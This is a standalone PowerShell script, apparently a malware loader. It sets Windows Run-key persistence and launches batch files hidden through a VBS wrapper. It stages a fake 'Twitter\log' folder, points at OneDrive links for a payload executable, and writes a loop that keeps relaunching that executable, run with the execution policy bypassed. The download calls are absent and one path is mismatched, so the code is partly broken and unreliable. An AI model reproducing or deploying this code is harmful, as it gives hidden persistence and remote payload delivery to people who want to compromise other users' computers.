

$Content = @'
REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 1 /d "C:\ProgramData\Twitter\log\Untitled.exe"
REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 2 /d "C:\Windows\System32\cmd.exe '/c  powershell -windo 1 -noexit -exec bypass -file C:\ProgramData\Twitter\log\look.ps1"
'@
Set-Content -Path C:\Users\Public\1.bat -Value $Content

$Content = @'
set WshShell = wscript.createobject("WScript.shell")
WshShell.run """C:\Users\Public\1.bat"" ", 0, true
Set WshShell = Nothing
'@
Set-Content -Path C:\Users\Public\1.vbs -Value $Content
start-sleep 10
start C:\Users\Public\1.vbs





$OutPath = "C:\ProgramData\Twitter\log\"
if (-not (Test-Path  $OutPath ))
        {
            New-Item $OutPath -ItemType Directory -Force
        }

start-sleep 5
$cZZZcZxc = "https://onedrive.live.com/Download?cid=358166AEFCA69E90&resid=358166AEFCA69E90%21140&authkey=AD54_li6xAtRpc8"
$tofile = "C:\ProgramData\Twitter\log\Untitled.exe"
$webclient = New-Object System.Net.WebClient


$cZZZcZxc = "https://onedrive.live.com/Download?cid=358166AEFCA69E90&resid=358166AEFCA69E90%21139&authkey=AOITnE4lBM7QpdQ"
$tofile = "C:\ProgramData\Twitter\log\Untitled.exe.manifest"
$webclient = New-Object System.Net.WebClient
start-sleep 5
$Content = @'
while ($true){
if((get-process "Untitled" -ea SilentlyContinue) -eq $Null){
{
}
start C:\ProgramData\Twitter\log\Untitled.exe
}
start-sleep 60
}
'@
Set-Content -Path C:\ProgramData\Twitter\log\look.ps1 -Value $Content

start-sleep 5


powershell -NoProfile -NonInteractive -NoLogo -WindowStyle hidden -ExecutionPolicy Unrestricted "C:\log\ProgramData\Twitter\log\look.ps1"


